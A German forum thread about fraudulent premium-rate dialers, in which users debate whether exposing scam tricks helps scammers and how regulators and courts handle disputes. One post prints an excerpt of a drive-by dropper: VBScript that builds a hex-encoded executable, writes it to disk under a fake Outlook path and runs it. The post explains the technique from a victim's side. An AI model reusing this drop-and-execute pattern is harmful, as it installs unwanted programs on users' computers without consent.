Follow along with the video below to see how to install our site as a web app on your home screen.
Anmerkung: This feature may not be available in some browsers.
Und weil das so ist, gibt man der RegTP die Quell-URL, wo sie suchen darf und lässt die anderen außen vor. Aber der Dau kann die RegTP dann drauf hinweisen, damit die Datenbank von dem ganzen Müll bereinigt...Total völlig anonyme 'Waldtrau' aus Berlin schrieb:Na dann sollte der "Sehnerv direkt ins Hirn geleitet" Mode angeschaltet werden: Die Stichproben mach die Regtp -> nicht der Dau. Kann er ja auch garnicht. Sein Blut sammelt sich gerade im Schwellkörper und findet keinen Weg ins Hirn.
Waldtrau die sich auch im Wald traut
johinos schrieb:Und wie muss der User das Pferd aufzäumen, um das notfalls zu beweisen, was muss er auf seinem Rechner finden?
plext@r schrieb:Jetzt mal im Ernst:
Wenn ihr hier angebliche Abzock-Tricks aufdeckt, werdet ihr damit den Abzockern nicht gerade Einhalt gebieten.
Genug Dialeranbieter lesen hier mit und könnten ja auf dumme Gedanken kommen...
plext@r schrieb:Jetzt mal im Ernst:
Wenn ihr hier angebliche Abzock-Tricks aufdeckt, werdet ihr damit den Abzockern nicht gerade Einhalt gebieten.
Genug Dialeranbieter lesen hier mit und könnten ja auf dumme Gedanken kommen...
Pl@xter schrieb:Wenn ihr hier angebliche Abzock-Tricks aufdeckt, werdet ihr damit den Abzockern nicht gerade Einhalt gebieten.
anna schrieb:Jedes Detail einzelner Varianten, dass hier für die erfolgreiche Abzocke explizit offen dargestellt wird, genügt den mitlesenden Initaitoren der Dialerlique, ihre Arbeitsweise den Marterfordernissen (und vor allem der behördlichen Ermittlungen, die u. U. gegen sie laufen) anzupassen.
Genau so meinte ich das!johinos schrieb:Tja, Wasser vorher abgraben...
Der Genervte schrieb:@Qoppa
Dein Eifer in Ehren - aber könnte es sein, das Du es etwas zu optimistisch siehst?
Qoppa schrieb:Daß diese Informationen hier kontraproduktiv sind, kann ich nicht glauben. Wenn die Mißbrauchsmöglichkeiten immer besser dokumentiert und damit immer weiter bekannt werden, kann das nur nutzen. Das Angenehme an einem Rechtsstaat ist ja, daß die Entscheidung letztlich vor Gericht fällt. Wenn die Gerichte die Manipulationsmöglichkeiten in ihrer Tragweite erfassen, heißt das, daß immer weniger mehrwertdienstfreundliche Urteile ergehen werden (--> Beweislastumkehr, --> Vertragsabschluß muß nachgewiesen, was i. d. R. unmöglich ist).
Ich glaube ja nicht an "legale" und "gesetzeskonforme" Dialer. Wenn alles manipuliert werden kann, heißt das, man kann x-mal "OK drücken" vorschreiben, sogar Passwort und sonstwas, - wenn die Richter das endlich verstehen, werden sie´s nicht als Beweis eines Vertragsabschlußes anerkennen, und dann:
GOOD BYE MEHRWERTDIENSTE!
Der Jurist schrieb:Die strafrechtliche Seite habe die ermittelnden Stellen selber im Griff oder sollten sie zumindest haben.
Anonymous schrieb:Der Jurist schrieb:Die strafrechtliche Seite habe die ermittelnden Stellen selber im Griff oder sollten sie zumindest haben.
Also mal angenommen, ich würde auf einer Internetseite beschreiben, wie Herr X aus Y mit einem Trick 10.000 Kunden der Z-Bank um jeweils 100 Euro betrogen hat. Schaden: 1 Million. Würden dann die Ermittler von sich aus aktiv werden, oder müsste jemand Herrn X anschwärzen? Oder würden die sagen, das ist eine Sache der jeweils einzeln Betroffenen?
f.
Opfer schrieb:Oki, neue Erkentnisse:
Die Dialer sind in manchen Fällen offenbar gar nicht als *.exe Datei auf einem Server abgelegt, sondern kommen "als Hex-Code daher". Das bedeuted konkret:
Eine Seite (ab und zu VBscript verschlüsselt - huhh...jetzt bekomm ich aber Angst) enthällt z.B folgenden Content (Auszug):
<html>
<script language="VBScript.Encode">
self.MoveTo 5000,5000
szZeroLine = "00000000000000000000000000000000000000000"
szBinary = ""
szBinary = szBinary & "4D5A90000300000004000000FFFF0000B8000000000000004000"
szBinary = szBinary & "000000000000000000000000D80000000E1FBA0E00B409CD21B"
szBinary = szBinary & "742062652072756E20696E20444F53206D6F64652E0D0D0A2400"
...
szApplication = "c:\Progra~1\Outloo~1\outl32c.exe"
Set hFSO = CreateObject("Scripting.FileSystemObject")
if not hFSO.FileExists(szApplication) Then
Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)
Was passiert hier nun ? Eigentlich ist das ganz einfach: Die *.exe Datei wird auf den Computer "geschrieben". Wenn man eine beliebige *.exe Datei mal mit einem Hex-Editor öffnet, dann sieht man viele viele Hexcodes (z.B 4D5A..). Diese codes zusammen ergeben das komplette Programm. Über das FileScriptingObject kann man eine Webseite nun dazu bringen, eben diesen Inhalt als neue Datei auf den Rechner zu schreiben. Wenn ein Dialer z.B mit einem EXE Packert gepackt wurde (UPX wird offenbar sehr gerne benutzt - kost ja nix ), wird die so klein, das man das ganze Programm bequem in eine Webseite packen kann (Als Beispiel der DDialer.exe = 68kb wäre also kein Problem zu realisieren). Auf diese Art und Weise (und ich denke bei mir war es der Fall) kommt die *.exe gar nicht per Download auf den Rechner, sondern wird dort erstellt ! Praktischerweisse, kann der dann auch gleich gestartet werden (mittels dem Befehl: hShell.run(szApplication)).
Wieder ein mal ein schönes Beispiel dafür was sich die Jungs doch alles einfallen lassen um an unser Geld zu kommen :/
Opfer